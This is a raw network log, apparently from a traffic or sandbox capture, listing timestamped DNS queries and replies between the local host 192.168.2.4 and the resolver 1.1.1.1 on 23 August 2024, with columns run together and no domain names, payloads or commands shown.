                                                                                                                                                                                                              Aug 23, 2024 18:48:52.609159946 CEST6087853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.609886885 CEST5498353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.609899044 CEST5152653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.610548973 CEST5746153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.611964941 CEST5306653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.612175941 CEST6369653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614048004 CEST5049953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614059925 CEST6330653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614207029 CEST6240253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614279985 CEST6354053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614582062 CEST5045753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614728928 CEST5811053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614728928 CEST5192253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614800930 CEST6314753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614875078 CEST6200253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614968061 CEST6421753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615046978 CEST5146053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615144014 CEST5321053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615314007 CEST6003353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615324974 CEST5587053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615504980 CEST6468853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615561962 CEST6399453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615675926 CEST6263853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615778923 CEST5536753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616015911 CEST6204053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616029024 CEST5802153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616267920 CEST5292753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616327047 CEST5000153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616494894 CEST4981253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616729021 CEST5510553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616751909 CEST6184953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616919994 CEST5671053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616959095 CEST5133353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617146015 CEST6216153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617146015 CEST6365053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617296934 CEST4949353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617337942 CEST6421353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617503881 CEST5597653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617503881 CEST6228653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617700100 CEST5107853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617712975 CEST5738553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617902040 CEST5699453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617902040 CEST6010953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618071079 CEST6007653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618109941 CEST5163253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618308067 CEST5845253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618308067 CEST6419553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618495941 CEST6529853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618531942 CEST6434153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618727922 CEST6355453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618727922 CEST6180753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618920088 CEST5524753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618951082 CEST5419653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.619103909 CEST6164453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.619158983 CEST4956053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.628232956 CEST53516231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.629379034 CEST53603901.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.629549026 CEST53635271.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.630711079 CEST53615051.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.631103039 CEST53633531.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.631969929 CEST53639901.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635217905 CEST53504571.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635436058 CEST53530661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635447025 CEST53514601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635552883 CEST53515261.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635564089 CEST53633061.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635572910 CEST53631471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635879993 CEST53519221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635890007 CEST53646881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635898113 CEST53635401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635906935 CEST53636961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635916948 CEST53529271.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635926008 CEST53642171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.635934114 CEST53558701.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638588905 CEST53600331.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638636112 CEST53620021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638645887 CEST53621611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638933897 CEST53551051.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638943911 CEST53620401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638952971 CEST53549831.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638962030 CEST53553671.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638972044 CEST53498121.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638982058 CEST53618491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638992071 CEST53580211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.638999939 CEST53636501.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.639009953 CEST53626381.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.639018059 CEST53600761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.639029026 CEST53652981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.639044046 CEST53641951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640240908 CEST53618071.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640252113 CEST53516321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640259981 CEST53513331.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640269995 CEST53643411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640279055 CEST53552471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640289068 CEST53642131.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640296936 CEST53510781.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640306950 CEST53584521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.640315056 CEST53622861.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.641750097 CEST53541961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.641761065 CEST53569941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.642812967 CEST53494931.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.647325039 CEST53548171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.649316072 CEST53636811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.653151989 CEST53519871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.659465075 CEST53608781.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.665637970 CEST53532101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.667121887 CEST53504991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.667139053 CEST53574611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.667922020 CEST53581101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.667933941 CEST53500011.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.667943954 CEST53559761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.667954922 CEST53567101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.668414116 CEST53495601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.668427944 CEST53635541.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.668437958 CEST53573851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.668450117 CEST53616441.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.670871973 CEST53601091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.670886993 CEST53624021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.670897007 CEST53639941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.673079014 CEST5199953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.673724890 CEST6350253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.674312115 CEST5980153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.674839020 CEST6499453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.675321102 CEST5952453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.675627947 CEST5496453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.675956964 CEST5321553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.676372051 CEST6544153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.676424980 CEST5586853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.676904917 CEST5988153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.677122116 CEST5383853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.679119110 CEST6168753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.679442883 CEST5839753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.680902958 CEST5314753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681075096 CEST6094653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681075096 CEST5632053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681075096 CEST5590953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681209087 CEST5967953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681294918 CEST6486053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681415081 CEST5058953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681449890 CEST6125653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681648016 CEST6260553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681737900 CEST6336553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681900024 CEST5682453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681941986 CEST5995653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682158947 CEST5130853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682188034 CEST5449653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682337999 CEST5386453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682529926 CEST5823453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682637930 CEST6196053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682779074 CEST6374353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682842970 CEST5116053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683024883 CEST5013053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683036089 CEST5330153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683228016 CEST5388153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683363914 CEST4942553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683398008 CEST5695153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683541059 CEST6075853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683792114 CEST5739553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683803082 CEST5885253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683973074 CEST5055653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684005976 CEST5063753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684185982 CEST5196553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684209108 CEST4984953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684345007 CEST5301353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684391022 CEST5204053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684506893 CEST5118553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684581995 CEST6026653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684669971 CEST6482653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684787035 CEST6092953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.684828043 CEST4961053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685530901 CEST6388253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685636997 CEST5594953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685720921 CEST5738853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685825109 CEST6177053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.685971022 CEST5997253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686136007 CEST5278753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686342001 CEST6223553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686342001 CEST6486453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686508894 CEST5325253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686508894 CEST5854253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686618090 CEST5552353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686686039 CEST5093253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.686817884 CEST5996253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.690424919 CEST53519991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.692823887 CEST53649941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.692840099 CEST53598811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.692850113 CEST53558681.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.693325043 CEST53654411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.693336964 CEST53532151.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.695179939 CEST53616871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.695193052 CEST53549641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.695204020 CEST53538381.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.696974993 CEST53538811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699038029 CEST53559091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699053049 CEST53596791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699062109 CEST53513081.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699841976 CEST53505891.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699858904 CEST53538641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699878931 CEST53619601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699889898 CEST53569511.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.699899912 CEST53568241.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.700112104 CEST53494251.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.700211048 CEST53506371.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.700222015 CEST53633651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.700231075 CEST53519651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.700824976 CEST53573951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701004982 CEST53588521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701015949 CEST53527871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701370001 CEST53573881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701381922 CEST53555231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701446056 CEST53648641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701457024 CEST53599721.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701466084 CEST53622351.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701807022 CEST53648261.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.701817036 CEST53638821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.718672991 CEST53498491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.718692064 CEST53509321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.718702078 CEST53599621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.718949080 CEST53559491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.718961954 CEST53635021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.718971968 CEST53598011.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.718981981 CEST53595241.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.720104933 CEST53563201.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.720326900 CEST53583971.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.720571995 CEST53612561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.720586061 CEST53609461.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.721087933 CEST53648601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.721100092 CEST53544961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.724041939 CEST53582341.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.725991964 CEST53511601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.726006031 CEST53511851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.726434946 CEST53520401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.726448059 CEST53531471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.726458073 CEST53533011.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728189945 CEST53532521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728204012 CEST53609291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728213072 CEST53617701.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728223085 CEST53602661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728233099 CEST53585421.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728243113 CEST53607581.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728251934 CEST53501301.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728262901 CEST53496101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.728271961 CEST53599561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.729923010 CEST53530131.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.852119923 CEST53626051.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.852683067 CEST53505561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.853858948 CEST53637431.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.224812984 CEST5637753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.225435972 CEST5853553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.226006031 CEST5564953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.226572037 CEST6071553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.227030039 CEST5493553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.227339983 CEST6263153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.227734089 CEST5385253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228112936 CEST6506653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228708982 CEST6161453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228708982 CEST5518453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228725910 CEST5650653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.228940010 CEST5858253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229387999 CEST6548853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229410887 CEST5707153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229895115 CEST5302553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.229933023 CEST5280953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230037928 CEST5172453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230556011 CEST6368653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230592012 CEST6094153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.230689049 CEST5981453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231211901 CEST6063553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231235027 CEST4932153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231384993 CEST4974653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.231909037 CEST5750853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.232152939 CEST6006353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.232719898 CEST5351153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.233071089 CEST5858853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.233828068 CEST6122853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.234117031 CEST4941453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.234844923 CEST6129853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.234961033 CEST5428753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.235502005 CEST6061953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.235517979 CEST6212953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.235730886 CEST4982853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.236156940 CEST5673253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:53.236267090 CEST6042153192.168.2.41.1.1.1
